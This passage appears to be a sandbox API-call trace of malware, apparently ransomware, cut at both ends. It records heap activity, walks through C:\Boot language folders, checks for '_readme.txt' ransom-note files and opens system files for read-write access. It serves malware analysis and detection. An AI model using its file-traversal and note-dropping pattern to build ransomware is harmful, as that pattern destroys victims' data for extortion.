lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.018] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0097.018] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.019] PathFindFileNameW (pszPath="") returned="" [0097.019] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.020] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.020] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.020] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.020] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0097.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.020] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0097.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.021] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.021] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.021] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.021] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0097.022] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.022] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.022] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned=".txt" [0097.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.022] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.022] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.023] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.023] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.026] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0097.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.027] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.027] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.027] PathFindFileNameW (pszPath="") returned="" [0097.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.027] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.028] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.028] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.028] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.028] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.029] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0097.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.029] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.029] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.029] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.029] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0097.029] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.030] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.030] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned=".txt" [0097.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.030] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.030] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.030] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.030] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 